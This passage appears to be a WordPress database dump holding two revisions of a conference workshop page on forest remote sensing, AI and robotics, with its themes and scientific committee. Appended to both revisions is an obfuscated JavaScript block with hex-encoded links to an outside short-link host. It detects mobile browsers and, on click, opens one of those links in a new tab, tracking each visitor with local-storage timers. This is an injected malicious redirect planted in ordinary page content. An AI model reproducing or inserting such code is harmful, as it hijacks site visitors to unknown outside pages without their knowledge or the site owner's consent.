technologies</strong></li>\r\n 	<li><strong>Machine and deep learning approaches for forest mensuration, reconstruction, and attribute estimation</strong></li>\r\n 	<li><strong>New knowledge and understanding about forest functioning processes</strong></li>\r\n 	<li><strong>Benchmarking as a mechanism to determine the potential and limitations of remote sensing systems and methods</strong></li>\r\n</ul>\r\n&nbsp;\r\n<h5><strong><u>Scientific Committee: </u></strong></h5>\r\n<ul>\r\n 	<li><strong>Xinlian Liang, Wuhan University, China</strong></li>\r\n 	<li><strong>Yunsheng Wang, Finnish Geospatial Research Institute, Finland</strong></li>\r\n 	<li><strong>Francesco Pirotti, University of Padova, Italy</strong></li>\r\n 	<li><strong>Joanne C. White, Canadian Forest Service, Canada</strong></li>\r\n 	<li><strong>Fabian Faßnacht, Freie Universität Berlin, Germany</strong></li>\r\n 	<li><strong>Maria Teresa Melis, University of Cagliari, Italy</strong></li>\r\n 	<li><strong>Weishu Gong, University of Maryland, College Park, USA</strong></li>\r\n 	<li><strong>Megumi Yamashita, Tokyo University of Agriculture and Technology, Japan</strong></li>\r\n 	<li><strong>Jaime Hernandez, University of Chile, Chile</strong></li>\r\n 	<li><strong>Martin Mokroš, Czech University of Life Sciences Prague, Czech Republic</strong></li>\r\n 	<li><strong>Mariana Campos, Finnish Geospatial Research Institute, Finland</strong></li>\r\n 	<li><strong>Roberto Pierdicca, Polytechnic University of Marche, Italy</strong></li>\r\n</ul>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"green\" style=\"shadow\" border_width=\"5\"][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','<strong>Smart Forests – Multi-scale forest ecosystem assessment and monitoring using remote sensing, artificial intelligence, and robotics</strong>','','inherit','closed','closed','','3049-revision-v1','','','2022-11-19 17:18:16','2022-11-19 17:18:16','',3049,'https://gsw2023.com/?p=3328',0,'revision','',0),
(3329,1,'2022-11-19 17:22:19','2022-11-19 17:22:19','[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"3050\" img_size=\"450*300\"][vc_separator color=\"green\" style=\"shadow\" border_width=\"5\"][/vc_column][vc_column width=\"3/4\"][vc_column_text]\r\n<h5 style=\"text-align: justify; color: black;\"><strong>This Smart Forests workshop focuses on the assessment and monitoring of forest ecosystems using state-of-the-art Remote Sensing (RS), artificial intelligence (AI), and robotics. Highlighted in this workshop will be emerging topics on data acquisition, pre-processing, information extraction, and forest remote sensing applications to support improved understanding of forest ecosystems, efficient management of forest resources, and multi-scale approaches for forest assessment and monitoring. One of the aims of this workshop will be to encourage discussions on innovative robotic operation of sensors, platforms, and AI powered processing technologies, from the perspectives of practical applications. The workshop also encourages the benchmarking of various data sources and processing methods for extracting key forest metrics and attributes and modelling forest processes.</strong></h5>\r\n<h5><strong>This workshop is jointly organized by</strong></h5>\r\n<ul>\r\n 	<li>\r\n<h5><strong>WGIII/1 Remote Sensing data processing and understanding</strong></h5>\r\n</li>\r\n 	<li>\r\n<h5><strong>WGI/7 Data quality and benchmark of sensors</strong></h5>\r\n</li>\r\n 	<li>\r\n<h5><strong>WGIII/8 Remote sensing for agricultural and natural ecosystems</strong></h5>\r\n</li>\r\n</ul>\r\n[/vc_column_text][vc_separator color=\"green\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]\r\n<h1 style=\"text-align: center;\"><strong>CHAIRS</strong></h1>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" image_paddings=\"10px 0px 5px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"57\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]\r\n<h2></h2>\r\n<h2>CO-CHAIRS</h2>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" image_paddings=\"10px 0px 5px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"58\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"green\" style=\"shadow\" border_width=\"5\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]\r\n<h5><strong><u>Themes of the event:</u></strong></h5>\r\n<ul>\r\n 	<li><strong>Advancements in novel sensors, platforms, data generation, and data fusion</strong></li>\r\n 	<li><strong>Automation and real-time system operations</strong></li>\r\n 	<li><strong>Innovation in robotic operation of sensors, platforms, and AI powered processing technologies</strong></li>\r\n 	<li><strong>Machine and deep learning approaches for forest mensuration, reconstruction, and attribute estimation</strong></li>\r\n 	<li><strong>New knowledge and understanding about forest functioning processes</strong></li>\r\n 	<li><strong>Benchmarking as a mechanism to determine the potential and limitations of remote sensing systems and methods</strong></li>\r\n</ul>\r\n&nbsp;\r\n<h5><strong><u>Scientific Committee: </u></strong></h5>\r\n<ul>\r\n 	<li><strong>Xinlian Liang, Wuhan University, China</strong></li>\r\n 	<li><strong>Yunsheng Wang, Finnish Geospatial Research Institute, Finland</strong></li>\r\n 	<li><strong>Francesco Pirotti, University of Padova, Italy</strong></li>\r\n 	<li><strong>Joanne C. White, Canadian Forest Service, Canada</strong></li>\r\n 	<li><strong>Fabian Faßnacht, Freie Universität Berlin, Germany</strong></li>\r\n 	<li><strong>Maria Teresa Melis, University of Cagliari, Italy</strong></li>\r\n 	<li><strong>Weishu Gong, University of Maryland, College Park, USA</strong></li>\r\n 	<li><strong>Megumi Yamashita, Tokyo University of Agriculture and Technology, Japan</strong></li>\r\n 	<li><strong>Jaime Hernandez, University of Chile, Chile</strong></li>\r\n 	<li><strong>Martin Mokroš, Czech University of Life Sciences Prague, Czech Republic</strong></li>\r\n 	<li><strong>Mariana Campos, Finnish Geospatial Research Institute, Finland</strong></li>\r\n 	<li><strong>Roberto Pierdicca, Polytechnic University of Marche, Italy</strong></li>\r\n</ul>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"green\" style=\"shadow\" border_width=\"5\"][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Smart Forests –                                                                                                        Forest ecosystem assessment and monitoring using Remote Sensing, Artificial Intelligence, and Robotics','','inherit','closed','closed','','3049-revision-v1','','','2022-11-19 17:22:19','2022-11-19 17:22:19','',3049,'https://gsw2023.com/?p=3329',0,'revision','',0),
